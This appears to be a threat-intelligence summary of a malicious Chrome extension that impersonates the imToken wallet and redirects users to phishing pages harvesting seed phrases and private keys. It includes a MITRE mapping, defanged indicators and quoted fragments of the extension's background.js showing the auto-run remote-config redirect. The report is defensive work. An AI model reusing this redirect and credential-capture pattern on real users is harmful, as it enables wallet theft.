Socket’s Threat Research Team discovered a malicious Chrome extension, lmToken Chromophore (extension ID bbhaganppipihlhjgaaeeeefbaoihcgi), that impersonates imToken while posing as a hex color visualizer and immediately redirects users to threat actor-controlled phishing pages. The extension fetches a remote target from a hardcoded JSONKeeper endpoint and opens lookalike domains that capture 12/24-word seed phrases or private keys, enabling immediate wallet takeover. #imToken #lmTokenChromophore
Keypoints
- The Chrome extension lmToken Chromophore (ID bbhaganppipihlhjgaaeeeefbaoihcgi) impersonates imToken and was published on February 2, 2026; it remains live with 39 weekly active users.
- On install and on click the extension auto-fetches a destination from a hardcoded JSONKeeper endpoint and opens a threat actor-controlled page instead of providing any legitimate functionality.
- The phishing domain chroomewedbstorre-detail-extension[.]com uses mixed-script homoglyphs to mimic imToken branding and funnels victims into credential-capture flows.
- Phishing pages request either a 12- or 24-word seed phrase or a plaintext private key and rely on externally hosted scripts (compute-fonts-appconnect.pages[.]dev) to validate and process inputs.
- After collecting secrets the workflow shows a fake password/setup sequence and then opens the legitimate token.im site as a decoy to reduce suspicion.
- Recommendations: restrict extension installs in sensitive profiles, verify wallet software via official channels, hunt for homoglyph/lookalike domains and remote-config endpoints, and treat any entered seed/private key as compromised and rotate keys immediately.
MITRE Techniques
- [T1195.002 ] Supply Chain Compromise – The extension was published in the Chrome Web Store to deliver malicious behavior via a trusted distribution channel. Quote: (‘Socket’s Threat Research Team uncovered a malicious Chrome extension, lmΤoken Chromophore … presented itself as a hex color visualizer in the Chrome Web Store.’)
- [T1176.001 ] Software Extensions: Browser Extensions – The threat delivered the attack through a browser extension whose primary runtime behavior is to redirect to remote phishing infrastructure. Quote: (‘background.js shows its true function. Rather than providing a legitimate interface, it retrieves a destination URL from a hardcoded JSON endpoint and opens a threat actor-controlled page.’)
- [T1059.007 ] Command and Scripting Interpreter: JavaScript – The extension uses JavaScript (background.js) to fetch remote configuration and open tabs that deliver phishing pages. Quote: (‘const endpoint = “https://www.jsonkeeper[.]com/b/KUWNE”; … chrome.tabs.create({ url: u });’)
- [T1204 ] User Execution – The redirect fires automatically on install and again on click, causing users to be exposed without expecting malicious behavior. Quote: (‘setTimeout(openStoredLink, 1000); // Auto-run shortly after install … chrome.action.onClicked.addListener(() => { openStoredLink(); // Re-run the same redirect on click’})
- [T1036 ] Masquerading – The attackers used mixed-script Unicode homoglyphs and imitated storefront styling to masquerade as the legitimate imToken brand. Quote: (‘The page title uses mixed-script Unicode homoglyphs to imitate imToken.’)
- [T1656 ] Impersonation – The landing pages impersonate imToken to deceive victims into believing the import flow is legitimate. Quote: (‘The landing page impersonates imToken using mixed-script homoglyphs and funnels victims into credential-capture flows’)
- [T1566 ] Phishing – The lookalike pages present wallet import flows that directly request seed phrases or private keys to harvest credentials. Quote: (‘funnels victims into credential-capture flows that request either a 12 or 24 word seed phrase or a private key.’)
- [T1583.001 ] Acquire Infrastructure: Domains – The threat actor acquired and used lookalike domains for hosting phishing pages (e.g., chroomewedbstorre-detail-extension[.]com). Quote: (‘Primary Redirect Page: https://chroomewedbstorre-detail-extension[.]com/detail-bbhaganppipihlhjgaaeeeefbaoihcgi’)
- [T1583.006 ] Acquire Infrastructure: Web Services – The attacker used third-party web services as remote configuration and hosting points (e.g., jsonkeeper[.]com endpoint). Quote: (‘the extension fetches a destination URL from a hardcoded JSONKeeper endpoint (jsonkeeper[.]com/b/KUWNE)’)
- [T1056.003 ] Input Capture: Web Portal Capture – The phishing pages capture sensitive wallet inputs via web forms asking for seed phrases or private keys. Quote: (‘the site asks for a 12 or 24 word seed phrase as though it were part of a standard wallet recovery process.’)
Indicators of Compromise
- [Extension ID ] Malicious Chrome extension identifier – bbhaganppipihlhjgaaeeeefbaoihcgi
- [Publisher Email ] Threat actor account used to register the extension – liomassi19855@gmail[.]com
- [Remote Configuration Endpoint ] Off-box JSON endpoint used to retarget victims – https://www[.]jsonkeeper[.]com/b/KUWNE
- [Phishing Domains/Pages ] Primary redirect and landing pages used to capture credentials – chroomewedbstorre-detail-extension[.]com/detail-bbhaganppipihlhjgaaeeeefbaoihcgi, and paths for Seed-Phrase and Private-Key captures
- [External Script Hosts ] Externally hosted JavaScript supporting mnemonic/private-key processing – compute-fonts-appconnect[.]pages[.]dev/sjcl-bip39.js, compute-fonts-appconnect[.]pages[.]dev/formScript.js, and 2 more scripts
- [Decoy/Legitimate Site ] Real site opened as a decoy after theft – https://token.im
Read more: https://socket.dev/blog/fake-imtoken-chrome-extension-steals-seed-phrases-via-phishing-redirects